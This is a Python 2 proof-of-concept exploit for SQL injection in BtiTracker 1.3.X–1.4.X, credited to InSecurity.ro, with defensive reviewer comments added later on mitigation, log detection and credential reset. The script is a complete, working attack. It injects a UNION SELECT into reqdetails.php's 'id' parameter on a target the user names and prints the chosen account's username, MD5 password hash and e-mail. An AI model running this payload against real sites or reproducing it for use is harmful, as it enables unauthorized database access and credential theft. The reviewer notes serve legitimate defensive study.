#!/usr/bin/env python
#
################################################################################
# [ xpl0it ]
# www.insecurity.ro
# NOTE(review): the ASCII-art logo that sat in this banner was mangled by page
# markup and is left out; the text lines of the banner are kept below.
################################################################################
#[ BtiTracker 1.3.X - 1.4.X Exploit ]#
#Greetz: daemien, Sirgod, Puscas_Marin, AndrewBoy, Ras, HrN, vilches #
#Greetz: excess, E.M.I.N.E.M, flo flow, paxnWo, begood, and ISR Staff#
################################################################################
# Because we care, we're security aware#
################################################################################
#
# Reviewer notes (defensive reading of this proof of concept)
# -----------------------------------------------------------
# Language: Python 2 (print statements, urllib2).
#
# What it demonstrates: one GET request to reqdetails.php whose `id` parameter
# carries a UNION SELECT against the `users` table; the script then pulls
# username, password hash and e-mail out of the returned HTML. This can only
# work if the application puts `id` into its SQL statement without forcing it
# to an integer or binding it as a parameter (inferred from the request; the
# PHP side is not shown on this page).
#
# Mitigation: in reqdetails.php, validate `id` as an integer and use a
# parameterized query; move off the affected 1.3.X - 1.4.X line if a fixed
# release is available. A WAF rule is a stopgap, not the fix.
#
# Detection: look in web access logs for reqdetails.php requests whose `id` is
# not a plain integer. The request built below contains `union+all+select`,
# `concat(0x2d,0x2d,`, `from+users` and the constant `-1337`. urllib2 sends a
# `Python-urllib/<version>` User-Agent unless the caller overrides it.
#
# Response: if such a request succeeded, treat the returned account's password
# hash and e-mail as disclosed and reset the credential. The regex below
# requires exactly 32 hex digits, which is the length of an MD5 digest --
# presumably the tracker stores MD5 hashes (confirm against the schema); if so,
# migrate to a salted, slow password hash.

import sys, urllib2, re

# With no arguments at all, print the usage banner and stop.
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit ==============="
    print "==============================================================="
    print "= Discovered and coded by TinKode ="
    print "= www.InSecurity.ro ="
    print "= ="
    print "= Local Command:="
    print "= ./isr.py [http://webshit] [ID]="
    print "= ="
    print "==============================================================="
    exit()

# The user ID is optional and defaults to 1. Note that `id` shadows the
# builtin of the same name, and that the command-line value stays a string.
if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]

# Base URL of the target installation, normalized to end with a slash.
shit = sys.argv[1]
if shit[-1:] != "/":
    shit += "/"

# Request URL. `and 1=0` empties the legitimate result set so that only the
# UNION row is rendered; column 4 is a concat of username, password and email,
# wrapped in "--" (0x2d,0x2d) and separated by ":" (0x3a) so the values can be
# located in the page. The backslashes continue the string literal across
# lines, so the three source lines form one URL with no whitespace in it.
url = shit + "reqdetails.php?id=-1337+and+1=0+union+all+select+1,2,3,\
concat(0x2d,0x2d,username,0x3a,password,0x3a,email,0x2d,0x2d)\
,5,6,7,8,9,10+from+users+where+ID=" + str(id) + "--"

print "\n"
print "============================================="
print "================= InSecurity ================"
print "============================================="

# Single GET with no timeout and no error handling: a network failure or an
# HTTP error status surfaces as an uncaught urllib2 exception.
html = urllib2.urlopen(url).read()

# Find the "--user:hash:email--" marker in the response. The middle group must
# be exactly 32 hex digits; `.` does not cross newlines, so a match lies on one
# line of the HTML. Only the first match is reported below.
slobod = re.findall(r"--(.*)\:([0-9a-fA-F]{32})\:(.*)--", html)
if len(slobod) > 0:
    print "ID : " + str(id)
    print "Username : " + slobod[0][0]
    print "Password : " + slobod[0][1]
    print "EMail: " + slobod[0][2]
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    # Failure message (Romanian slang), printed when the marker pattern is
    # not present in the response.
    print "Ai luat-o la gaoaza..."
#InSecurity.ro - Romania